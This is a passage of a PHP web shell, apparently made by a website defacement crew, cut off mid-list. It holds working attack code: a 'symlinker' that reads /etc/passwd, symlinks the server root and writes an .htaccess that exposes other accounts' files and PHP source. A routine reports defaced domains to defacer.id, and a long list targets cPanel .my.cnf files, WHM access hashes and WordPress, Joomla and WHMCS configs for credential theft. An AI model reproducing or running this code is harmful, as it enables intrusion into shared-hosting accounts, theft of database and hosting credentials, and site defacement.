  2396. $fw3 = fwrite($fp3,$file3);
  2397. @fclose($fp3);
  2398. echo "
  2399. <table align=center border=1><tr>
  2400. <td align=center><font size=3>S. No.</font></td>
  2401. <td align=center><font size=3>Users</font></td>
  2402. <td align=center><font size=3>Symlink</font></td></tr>";
  2403. $dcount = 1;
  2404. $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  2405. while(!feof($file)){
  2406. $s = fgets($file);
  2407. $matches = array();
  2408. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  2409. $matches = str_replace("home/","",$matches[1]);
  2410. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  2411. continue;
  2412. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  2413. <td align=center><font class=txt>" . $matches . "</td>";
  2414. echo "<td align=center><font class=txt><a href=$full/viewsm/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  2415. $dcount++;}fclose($file);
  2416. echo "</table>";}else{if($os != "Windows"){@mkdir("viewsm",0777);@chdir("viewsm");@exe("ln -s / root");$file3 = '
  2417. Options Indexes FollowSymLinks
  2418. DirectoryIndex janchonx.htm
  2419. AddType text/plain .php
  2420. AddHandler text/plain .php
  2421. Satisfy Any
  2422. ';
  2423. $fp3 = fopen('.htaccess','w');
  2424. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  2425. echo "
  2426. <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
  2427. <table align=center border=1><tr>
  2428. <td align=center><font size=3>ID</font></td>
  2429. <td align=center><font size=3>Users</font></td>
  2430. <td align=center><font size=3>Symlink</font></td></tr>";
  2431. $temp = "";$val1 = 0;$val2 = 1000;
  2432. for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  2433. if ($uid)$temp .= join(':',$uid)."\n";}
  2434. echo '<br/>';$temp = trim($temp);$file5 =
  2435. fopen("test.txt","w");
  2436. fputs($file5,$temp);
  2437. fclose($file5);$dcount = 1;$file =
  2438. fopen("test.txt", "r") or exit("Unable to open file!");
  2439. while(!feof($file)){$s = fgets($file);$matches = array();
  2440. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  2441. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  2442. continue;
  2443. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  2444. <td align=center><font class=txt>" . $matches . "</td>";
  2445. echo "<td align=center><font class=txt><a href=$full/viewsm/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  2446. $dcount++;}
  2447. fclose($file);
  2448. echo "</table></div></center>";unlink("test.txt");
  2449. } else
  2450. echo "<center><font size=3>Cannot create Symlink</font></center>";
  2451. }
  2452. }
  2453. }
  2454. elseif($_GET['do'] == 'defacerid') {
  2455. echo "<center><form method='post'>
  2456. <u>Defacer</u>: <br>
  2457. <input type='text' name='hekel' size='50' value='Mr.ToKeiChun69'><br>
  2458. <u>Team</u>: <br>
  2459. <input type='text' name='tim' size='50' value='Extreme Crew'><br>
  2460. <u>Domains</u>: <br>
  2461. <textarea style='width: 450px; height: 150px;' name='sites'></textarea><br>
  2462. <input type='submit' name='go' value='Submit' style='width: 450px;'>
  2463. </form>";
  2464. $site = explode("\r\n", $_POST['sites']);
  2465. $go = $_POST['go'];
  2466. $hekel = $_POST['hekel'];
  2467. $tim = $_POST['tim'];
  2468. if($go) {
  2469. foreach($site as $sites) {
  2470. $zh = $sites;
  2471. $form_url = "https://www.defacer.id/notify";
  2472. $data_to_post = array();
  2473. $data_to_post['attacker'] = "$hekel";
  2474. $data_to_post['team'] = "$tim";
  2475. $data_to_post['poc'] = 'SQL Injection';
  2476. $data_to_post['url'] = "$zh";
  2477. $curl = curl_init();
  2478. curl_setopt($curl,CURLOPT_URL, $form_url);
  2479. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
  2480. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
  2481. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
  2482. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  2483. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
  2484. $result = curl_exec($curl);
  2485. echo $result;
  2486. curl_close($curl);
  2487. echo "<br>";
  2488. }
  2489. }
  2490. }
  2491.  
  2492. elseif($_GET['do'] == 'config') {
  2493. if($_POST){
  2494. $passwd = $_POST['passwd'];
  2495. mkdir("viewcg", 0777);
  2496. $isi_htc = "Options all\nRequire None\nSatisfy Any";
  2497. $htc = fopen("viewcg/.htaccess","w");
  2498. fwrite($htc, $isi_htc);
  2499. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  2500. foreach($user_config[1] as $user_chonx) {
  2501. $user_config_dir = "/home/$user_chonx/public_html/";
  2502. if(is_readable($user_config_dir)) {
  2503. $grab_config = array(
  2504. "/home/$user_chonx/.my.cnf" => "cpanel",
  2505. "/home/$user_chonx/.accesshash" => "WHM-accesshash",
  2506. "/home/$user_chonx/public_html/bw-configs/config.ini" => "BosWeb",
  2507. "/home/$user_chonx/public_html/config/koneksi.php" => "Lokomedia",
  2508. "/home/$user_chonx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2509. "/home/$user_chonx/public_html/clientarea/configuration.php" => "WHMCS",
  2510. "/home/$user_chonx/public_html/whmcs/configuration.php" => "WHMCS",
  2511. "/home/$user_chonx/public_html/forum/config.php" => "phpBB",
  2512. "/home/$user_chonx/public_html/sites/default/settings.php" => "Drupal",
  2513. "/home/$user_chonx/public_html/config/settings.inc.php" => "PrestaShop",
  2514. "/home/$user_chonx/public_html/app/etc/local.xml" => "Magento",
  2515. "/home/$user_chonx/public_html/admin/config.php" => "OpenCart",
  2516. "/home/$user_chonx/public_html/slconfig.php" => "Sitelok",
  2517. "/home/$user_chonx/public_html/application/config/database.php" => "Ellislab",
  2518. "/home/$user_chonx/public_html/whm/configuration.php" => "WHMCS",
  2519. "/home/$user_chonx/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2520. "/home/$user_chonx/public_html/central/configuration.php" => "WHM Central",
  2521. "/home/$user_chonx/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2522. "/home/$user_chonx/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2523. "/home/$user_chonx/public_html/submitticket.php" => "WHMCS",
  2524. "/home/$user_chonx/public_html/configuration.php" => "Joomla",
  2525. "/home/$user_chonx/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2526. "/home/$user_chonx/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2527. "/home/$user_chonx/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",
  2528. "/home/$user_chonx/public_html/Home/configuration.php" => "JoomlaHome",
  2529. "/home/$user_chonx/public_html/HOME/configuration.php" => "JoomlaHome",
  2530. "/home/$user_chonx/public_html/home/configuration.php" => "JoomlaHome",
  2531. "/home/$user_chonx/public_html/NEW/configuration.php" => "JoomlaNew",
  2532. "/home/$user_chonx/public_html/New/configuration.php" => "JoomlaNew",
  2533. "/home/$user_chonx/public_html/new/configuration.php" => "JoomlaNew",
  2534. "/home/$user_chonx/public_html/News/configuration.php" => "JoomlaNews",
  2535. "/home/$user_chonx/public_html/NEWS/configuration.php" => "JoomlaNews",
  2536. "/home/$user_chonx/public_html/news/configuration.php" => "JoomlaNews",
  2537. "/home/$user_chonx/public_html/Cms/configuration.php" => "JoomlaCms",
  2538. "/home/$user_chonx/public_html/CMS/configuration.php" => "JoomlaCms",
  2539. "/home/$user_chonx/public_html/cms/configuration.php" => "JoomlaCms",
  2540. "/home/$user_chonx/public_html/Main/configuration.php" => "JoomlaMain",
  2541. "/home/$user_chonx/public_html/MAIN/configuration.php" => "JoomlaMain",
  2542. "/home/$user_chonx/public_html/main/configuration.php" => "JoomlaMain",
  2543. "/home/$user_chonx/public_html/Blog/configuration.php" => "JoomlaBlog",
  2544. "/home/$user_chonx/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2545. "/home/$user_chonx/public_html/blog/configuration.php" => "JoomlaBlog",
  2546. "/home/$user_chonx/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2547. "/home/$user_chonx/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2548. "/home/$user_chonx/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2549. "/home/$user_chonx/public_html/beta/configuration.php" => "JoomlaBeta",
  2550. "/home/$user_chonx/public_html/Beta/configuration.php" => "JoomlaBeta",
  2551. "/home/$user_chonx/public_html/BETA/configuration.php" => "JoomlaBeta",
  2552. "/home/$user_chonx/public_html/PRESS/configuration.php" => "JoomlaPress",
  2553. "/home/$user_chonx/public_html/Press/configuration.php" => "JoomlaPress",
  2554. "/home/$user_chonx/public_html/press/configuration.php" => "JoomlaPress",
  2555. "/home/$user_chonx/public_html/Wp/configuration.php" => "JoomlaWp",
  2556. "/home/$user_chonx/public_html/wp/configuration.php" => "JoomlaWp",
  2557. "/home/$user_chonx/public_html/WP/configuration.php" => "JoomlaWP",
  2558. "/home/$user_chonx/public_html/portal/configuration.php" => "JoomlaPortal",
  2559. "/home/$user_chonx/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2560. "/home/$user_chonx/public_html/Portal/configuration.php" => "JoomlaPortal",
  2561. "/home/$user_chonx/public_html/wp-config.php" => "WordPress",
  2562. "/home/$user_chonx/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2563. "/home/$user_chonx/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2564. "/home/$user_chonx/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",
  2565. "/home/$user_chonx/public_html/Home/wp-config.php" => "WordPressHome",
  2566. "/home/$user_chonx/public_html/HOME/wp-config.php" => "WordPressHome",
  2567. "/home/$user_chonx/public_html/home/wp-config.php" => "WordPressHome",
  2568. "/home/$user_chonx/public_html/NEW/wp-config.php" => "WordPressNew",
  2569. "/home/$user_chonx/public_html/New/wp-config.php" => "WordPressNew",
  2570. "/home/$user_chonx/public_html/new/wp-config.php" => "WordPressNew",
  2571. "/home/$user_chonx/public_html/News/wp-config.php" => "WordPressNews",
  2572. "/home/$user_chonx/public_html/NEWS/wp-config.php" => "WordPressNews",
  2573. "/home/$user_chonx/public_html/news/wp-config.php" => "WordPressNews",
  2574. "/home/$user_chonx/public_html/Cms/wp-config.php" => "WordPressCms",
  2575. "/home/$user_chonx/public_html/CMS/wp-config.php" => "WordPressCms",
  2576. "/home/$user_chonx/public_html/cms/wp-config.php" => "WordPressCms",
  2577. "/home/$user_chonx/public_html/Main/wp-config.php" => "WordPressMain",
  2578. "/home/$user_chonx/public_html/MAIN/wp-config.php" => "WordPressMain",
  2579. "/home/$user_chonx/public_html/main/wp-config.php" => "WordPressMain",
  2580. "/home/$user_chonx/public_html/Blog/wp-config.php" => "WordPressBlog",
  2581. "/home/$user_chonx/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2582. "/home/$user_chonx/public_html/blog/wp-config.php" => "WordPressBlog",
  2583. "/home/$user_chonx/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2584. "/home/$user_chonx/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2585. "/home/$user_chonx/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2586. "/home/$user_chonx/public_html/beta/wp-config.php" => "WordPressBeta",
  2587. "/home/$user_chonx/public_html/Beta/wp-config.php" => "WordPressBeta",
  2588. "/home/$user_chonx/public_html/BETA/wp-config.php" => "WordPressBeta",
  2589. "/home/$user_chonx/public_html/PRESS/wp-config.php" => "WordPressPress",
  2590. "/home/$user_chonx/public_html/Press/wp-config.php" => "WordPressPress",
  2591. "/home/$user_chonx/public_html/press/wp-config.php" => "WordPressPress",
  2592. "/home/$user_chonx/public_html/Wp/wp-config.php" => "WordPressWp",
  2593. "/home/$user_chonx/public_html/wp/wp-config.php" => "WordPressWp",
  2594. "/home/$user_chonx/public_html/WP/wp-config.php" => "WordPressWP",
  2595. "/home/$user_chonx/public_html/portal/wp-config.php" => "WordPressPortal",
  2596. "/home/$user_chonx/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2597. "/home/$user_chonx/public_html/Portal/wp-config.php" => "WordPressPortal",
  2598. "/home1/$user_chonx/.my.cnf" => "cpanel",
  2599. "/home1/$user_chonx/.accesshash" => "WHM-accesshash",
  2600. "/home1/$user_chonx/public_html/bw-configs/config.ini" => "BosWeb",
  2601. "/home1/$user_chonx/public_html/config/koneksi.php" => "Lokomedia",
  2602. "/home1/$user_chonx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2603. "/home1/$user_chonx/public_html/clientarea/configuration.php" => "WHMCS",
  2604. "/home1/$user_chonx/public_html/whmcs/configuration.php" => "WHMCS",
  2605. "/home1/$user_chonx/public_html/forum/config.php" => "phpBB",
  2606. "/home1/$user_chonx/public_html/sites/default/settings.php" => "Drupal",
  2607. "/home1/$user_chonx/public_html/config/settings.inc.php" => "PrestaShop",
  2608. "/home1/$user_chonx/public_html/app/etc/local.xml" => "Magento",
  2609. "/home1/$user_chonx/public_html/admin/config.php" => "OpenCart",
  2610. "/home1/$user_chonx/public_html/slconfig.php" => "Sitelok",
  2611. "/home1/$user_chonx/public_html/application/config/database.php" => "Ellislab",
  2612. "/home1/$user_chonx/public_html/whm/configuration.php" => "WHMCS",
  2613. "/home1/$user_chonx/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2614. "/home1/$user_chonx/public_html/central/configuration.php" => "WHM Central",
  2615. "/home1/$user_chonx/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2616. "/home1/$user_chonx/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2617. "/home1/$user_chonx/public_html/submitticket.php" => "WHMCS",
  2618. "/home1/$user_chonx/public_html/configuration.php" => "Joomla",
  2619. "/home1/$user_chonx/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2620. "/home1/$user_chonx/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2621. "/home1/$user_chonx/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",
  2622. "/home1/$user_chonx/public_html/Home/configuration.php" => "JoomlaHome",
  2623. "/home1/$user_chonx/public_html/HOME/configuration.php" => "JoomlaHome",
  2624. "/home1/$user_chonx/public_html/home/configuration.php" => "JoomlaHome",
  2625. "/home1/$user_chonx/public_html/NEW/configuration.php" => "JoomlaNew",
  2626. "/home1/$user_chonx/public_html/New/configuration.php" => "JoomlaNew",
  2627. "/home1/$user_chonx/public_html/new/configuration.php" => "JoomlaNew",
  2628. "/home1/$user_chonx/public_html/News/configuration.php" => "JoomlaNews",
  2629. "/home1/$user_chonx/public_html/NEWS/configuration.php" => "JoomlaNews",
  2630. "/home1/$user_chonx/public_html/news/configuration.php" => "JoomlaNews",
  2631. "/home1/$user_chonx/public_html/Cms/configuration.php" => "JoomlaCms",
  2632. "/home1/$user_chonx/public_html/CMS/configuration.php" => "JoomlaCms",
  2633. "/home1/$user_chonx/public_html/cms/configuration.php" => "JoomlaCms",
  2634. "/home1/$user_chonx/public_html/Main/configuration.php" => "JoomlaMain",
  2635. "/home1/$user_chonx/public_html/MAIN/configuration.php" => "JoomlaMain",
  2636. "/home1/$user_chonx/public_html/main/configuration.php" => "JoomlaMain",
  2637. "/home1/$user_chonx/public_html/Blog/configuration.php" => "JoomlaBlog",
  2638. "/home1/$user_chonx/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2639. "/home1/$user_chonx/public_html/blog/configuration.php" => "JoomlaBlog",
  2640. "/home1/$user_chonx/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2641. "/home1/$user_chonx/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2642. "/home1/$user_chonx/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2643. "/home1/$user_chonx/public_html/beta/configuration.php" => "JoomlaBeta",
  2644. "/home1/$user_chonx/public_html/Beta/configuration.php" => "JoomlaBeta",
  2645. "/home1/$user_chonx/public_html/BETA/configuration.php" => "JoomlaBeta",
  2646. "/home1/$user_chonx/public_html/PRESS/configuration.php" => "JoomlaPress",
  2647. "/home1/$user_chonx/public_html/Press/configuration.php" => "JoomlaPress",
  2648. "/home1/$user_chonx/public_html/press/configuration.php" => "JoomlaPress",
  2649. "/home1/$user_chonx/public_html/Wp/configuration.php" => "JoomlaWp",
  2650. "/home1/$user_chonx/public_html/wp/configuration.php" => "JoomlaWp",
  2651. "/home1/$user_chonx/public_html/WP/configuration.php" => "JoomlaWP",
  2652. "/home1/$user_chonx/public_html/portal/configuration.php" => "JoomlaPortal",
  2653. "/home1/$user_chonx/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2654. "/home1/$user_chonx/public_html/Portal/configuration.php" => "JoomlaPortal",
  2655. "/home1/$user_chonx/public_html/wp-config.php" => "WordPress",
  2656. "/home1/$user_chonx/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2657. "/home1/$user_chonx/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2658. "/home1/$user_chonx/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",
  2659. "/home1/$user_chonx/public_html/Home/wp-config.php" => "WordPressHome",
  2660. "/home1/$user_chonx/public_html/HOME/wp-config.php" => "WordPressHome",
  2661. "/home1/$user_chonx/public_html/home/wp-config.php" => "WordPressHome",
  2662. "/home1/$user_chonx/public_html/NEW/wp-config.php" => "WordPressNew",
  2663. "/home1/$user_chonx/public_html/New/wp-config.php" => "WordPressNew",
  2664. "/home1/$user_chonx/public_html/new/wp-config.php" => "WordPressNew",
  2665. "/home1/$user_chonx/public_html/News/wp-config.php" => "WordPressNews",
  2666. "/home1/$user_chonx/public_html/NEWS/wp-config.php" => "WordPressNews",
  2667. "/home1/$user_chonx/public_html/news/wp-config.php" => "WordPressNews",
  2668. "/home1/$user_chonx/public_html/Cms/wp-config.php" => "WordPressCms",
  2669. "/home1/$user_chonx/public_html/CMS/wp-config.php" => "WordPressCms",
  2670. "/home1/$user_chonx/public_html/cms/wp-config.php" => "WordPressCms",
  2671. "/home1/$user_chonx/public_html/Main/wp-config.php" => "WordPressMain",
  2672. "/home1/$user_chonx/public_html/MAIN/wp-config.php" => "WordPressMain",
  2673. "/home1/$user_chonx/public_html/main/wp-config.php" => "WordPressMain",
  2674. "/home1/$user_chonx/public_html/Blog/wp-config.php" => "WordPressBlog",
  2675. "/home1/$user_chonx/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2676. "/home1/$user_chonx/public_html/blog/wp-config.php" => "WordPressBlog",
  2677. "/home1/$user_chonx/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2678. "/home1/$user_chonx/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2679. "/home1/$user_chonx/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2680. "/home1/$user_chonx/public_html/beta/wp-config.php" => "WordPressBeta",
  2681. "/home1/$user_chonx/public_html/Beta/wp-config.php" => "WordPressBeta",
  2682. "/home1/$user_chonx/public_html/BETA/wp-config.php" => "WordPressBeta",
  2683. "/home1/$user_chonx/public_html/PRESS/wp-config.php" => "WordPressPress",
  2684. "/home1/$user_chonx/public_html/Press/wp-config.php" => "WordPressPress",
  2685. "/home1/$user_chonx/public_html/press/wp-config.php" => "WordPressPress",
  2686. "/home1/$user_chonx/public_html/Wp/wp-config.php" => "WordPressWp",
  2687. "/home1/$user_chonx/public_html/wp/wp-config.php" => "WordPressWp",
  2688. "/home1/$user_chonx/public_html/WP/wp-config.php" => "WordPressWP",
  2689. "/home1/$user_chonx/public_html/portal/wp-config.php" => "WordPressPortal",
  2690. "/home1/$user_chonx/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2691. "/home1/$user_chonx/public_html/Portal/wp-config.php" => "WordPressPortal",
  2692. "/home2/$user_chonx/.my.cnf" => "cpanel",
  2693. "/home2/$user_chonx/.accesshash" => "WHM-accesshash",
  2694. "/home2/$user_chonx/public_html/bw-configs/config.ini" => "BosWeb",
  2695. "/home2/$user_chonx/public_html/config/koneksi.php" => "Lokomedia",
  2696. "/home2/$user_chonx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2697. "/home2/$user_chonx/public_html/clientarea/configuration.php" => "WHMCS",
  2698. "/home2/$user_chonx/public_html/whmcs/configuration.php" => "WHMCS",
  2699. "/home2/$user_chonx/public_html/forum/config.php" => "phpBB",
  2700. "/home2/$user_chonx/public_html/sites/default/settings.php" => "Drupal",
  2701. "/home2/$user_chonx/public_html/config/settings.inc.php" => "PrestaShop",
  2702. "/home2/$user_chonx/public_html/app/etc/local.xml" => "Magento",
  2703. "/home2/$user_chonx/public_html/admin/config.php" => "OpenCart",
  2704. "/home2/$user_chonx/public_html/slconfig.php" => "Sitelok",
  2705. "/home2/$user_chonx/public_html/application/config/database.php" => "Ellislab",
  2706. "/home2/$user_chonx/public_html/whm/configuration.php" => "WHMCS",
  2707. "/home2/$user_chonx/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2708. "/home2/$user_chonx/public_html/central/configuration.php" => "WHM Central",
  2709. "/home2/$user_chonx/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2710. "/home2/$user_chonx/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2711. "/home2/$user_chonx/public_html/submitticket.php" => "WHMCS",
  2712. "/home2/$user_chonx/public_html/configuration.php" => "Joomla",
  2713. "/home2/$user_chonx/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2714. "/home2/$user_chonx/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2715. "/home2/$user_chonx/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",
  2716. "/home2/$user_chonx/public_html/Home/configuration.php" => "JoomlaHome",
  2717. "/home2/$user_chonx/public_html/HOME/configuration.php" => "JoomlaHome",
  2718. "/home2/$user_chonx/public_html/home/configuration.php" => "JoomlaHome",
  2719. "/home2/$user_chonx/public_html/NEW/configuration.php" => "JoomlaNew",
  2720. "/home2/$user_chonx/public_html/New/configuration.php" => "JoomlaNew",
  2721. "/home2/$user_chonx/public_html/new/configuration.php" => "JoomlaNew",
  2722. "/home2/$user_chonx/public_html/News/configuration.php" => "JoomlaNews",
  2723. "/home2/$user_chonx/public_html/NEWS/configuration.php" => "JoomlaNews",
  2724. "/home2/$user_chonx/public_html/news/configuration.php" => "JoomlaNews",
  2725. "/home2/$user_chonx/public_html/Cms/configuration.php" => "JoomlaCms",
  2726. "/home2/$user_chonx/public_html/CMS/configuration.php" => "JoomlaCms",
  2727. "/home2/$user_chonx/public_html/cms/configuration.php" => "JoomlaCms",
  2728. "/home2/$user_chonx/public_html/Main/configuration.php" => "JoomlaMain",
  2729. "/home2/$user_chonx/public_html/MAIN/configuration.php" => "JoomlaMain",
  2730. "/home2/$user_chonx/public_html/main/configuration.php" => "JoomlaMain",
  2731. "/home2/$user_chonx/public_html/Blog/configuration.php" => "JoomlaBlog",
  2732. "/home2/$user_chonx/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2733. "/home2/$user_chonx/public_html/blog/configuration.php" => "JoomlaBlog",
  2734. "/home2/$user_chonx/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2735. "/home2/$user_chonx/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2736. "/home2/$user_chonx/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2737. "/home2/$user_chonx/public_html/beta/configuration.php" => "JoomlaBeta",
  2738. "/home2/$user_chonx/public_html/Beta/configuration.php" => "JoomlaBeta",
  2739. "/home2/$user_chonx/public_html/BETA/configuration.php" => "JoomlaBeta",
  2740. "/home2/$user_chonx/public_html/PRESS/configuration.php" => "JoomlaPress",
  2741. "/home2/$user_chonx/public_html/Press/configuration.php" => "JoomlaPress",
  2742. "/home2/$user_chonx/public_html/press/configuration.php" => "JoomlaPress",
  2743. "/home2/$user_chonx/public_html/Wp/configuration.php" => "JoomlaWp",
  2744. "/home2/$user_chonx/public_html/wp/configuration.php" => "JoomlaWp",
  2745. "/home2/$user_chonx/public_html/WP/configuration.php" => "JoomlaWP",
  2746. "/home2/$user_chonx/public_html/portal/configuration.php" => "JoomlaPortal",
  2747. "/home2/$user_chonx/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2748. "/home2/$user_chonx/public_html/Portal/configuration.php" => "JoomlaPortal",
  2749. "/home2/$user_chonx/public_html/wp-config.php" => "WordPress",
  2750. "/home2/$user_chonx/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2751. "/home2/$user_chonx/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2752. "/home2/$user_chonx/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",
  2753. "/home2/$user_chonx/public_html/Home/wp-config.php" => "WordPressHome",
  2754. "/home2/$user_chonx/public_html/HOME/wp-config.php" => "WordPressHome",
  2755. "/home2/$user_chonx/public_html/home/wp-config.php" => "WordPressHome",
  2756. "/home2/$user_chonx/public_html/NEW/wp-config.php" => "WordPressNew",
  2757. "/home2/$user_chonx/public_html/New/wp-config.php" => "WordPressNew",
  2758. "/home2/$user_chonx/public_html/new/wp-config.php" => "WordPressNew",
  2759. "/home2/$user_chonx/public_html/News/wp-config.php" => "WordPressNews",
  2760. "/home2/$user_chonx/public_html/NEWS/wp-config.php" => "WordPressNews",
  2761. "/home2/$user_chonx/public_html/news/wp-config.php" => "WordPressNews",
  2762. "/home2/$user_chonx/public_html/Cms/wp-config.php" => "WordPressCms",
  2763. "/home2/$user_chonx/public_html/CMS/wp-config.php" => "WordPressCms",
  2764. "/home2/$user_chonx/public_html/cms/wp-config.php" => "WordPressCms",
  2765. "/home2/$user_chonx/public_html/Main/wp-config.php" => "WordPressMain",
  2766. "/home2/$user_chonx/public_html/MAIN/wp-config.php" => "WordPressMain",
  2767. "/home2/$user_chonx/public_html/main/wp-config.php" => "WordPressMain",
  2768. "/home2/$user_chonx/public_html/Blog/wp-config.php" => "WordPressBlog",
  2769. "/home2/$user_chonx/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2770. "/home2/$user_chonx/public_html/blog/wp-config.php" => "WordPressBlog",
  2771. "/home2/$user_chonx/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2772. "/home2/$user_chonx/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2773. "/home2/$user_chonx/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2774. "/home2/$user_chonx/public_html/beta/wp-config.php" => "WordPressBeta",
  2775. "/home2/$user_chonx/public_html/Beta/wp-config.php" => "WordPressBeta",
  2776. "/home2/$user_chonx/public_html/BETA/wp-config.php" => "WordPressBeta",
  2777. "/home2/$user_chonx/public_html/PRESS/wp-config.php" => "WordPressPress",
  2778. "/home2/$user_chonx/public_html/Press/wp-config.php" => "WordPressPress",
  2779. "/home2/$user_chonx/public_html/press/wp-config.php" => "WordPressPress",
  2780. "/home2/$user_chonx/public_html/Wp/wp-config.php" => "WordPressWp",
  2781. "/home2/$user_chonx/public_html/wp/wp-config.php" => "WordPressWp",
  2782. "/home2/$user_chonx/public_html/WP/wp-config.php" => "WordPressWP",
  2783. "/home2/$user_chonx/public_html/portal/wp-config.php" => "WordPressPortal",
  2784. "/home2/$user_chonx/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2785. "/home2/$user_chonx/public_html/Portal/wp-config.php" => "WordPressPortal",
  2786. "/home3/$user_chonx/.my.cnf" => "cpanel",
  2787. "/home3/$user_chonx/.accesshash" => "WHM-accesshash",
  2788. "/home3/$user_chonx/public_html/bw-configs/config.ini" => "BosWeb",
  2789. "/home3/$user_chonx/public_html/config/koneksi.php" => "Lokomedia",
  2790. "/home3/$user_chonx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2791. "/home3/$user_chonx/public_html/clientarea/configuration.php" => "WHMCS",
  2792. "/home3/$user_chonx/public_html/whmcs/configuration.php" => "WHMCS",
  2793. "/home3/$user_chonx/public_html/forum/config.php" => "phpBB",
  2794. "/home3/$user_chonx/public_html/sites/default/settings.php" => "Drupal",
  2795. "/home3/$user_chonx/public_html/config/settings.inc.php" => "PrestaShop",
  2796. "/home3/$user_chonx/public_html/app/etc/local.xml" => "Magento",
  2797. "/home3/$user_chonx/public_html/admin/config.php" => "OpenCart",
  2798. "/home3/$user_chonx/public_html/slconfig.php" => "Sitelok",
  2799. "/home3/$user_chonx/public_html/application/config/database.php" => "Ellislab",
  2800. "/home3/$user_chonx/public_html/whm/configuration.php" => "WHMCS",
  2801. "/home3/$user_chonx/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2802. "/home3/$user_chonx/public_html/central/configuration.php" => "WHM Central",
  2803. "/home3/$user_chonx/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2804. "/home3/$user_chonx/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2805. "/home3/$user_chonx/public_html/submitticket.php" => "WHMCS",
  2806. "/home3/$user_chonx/public_html/configuration.php" => "Joomla",
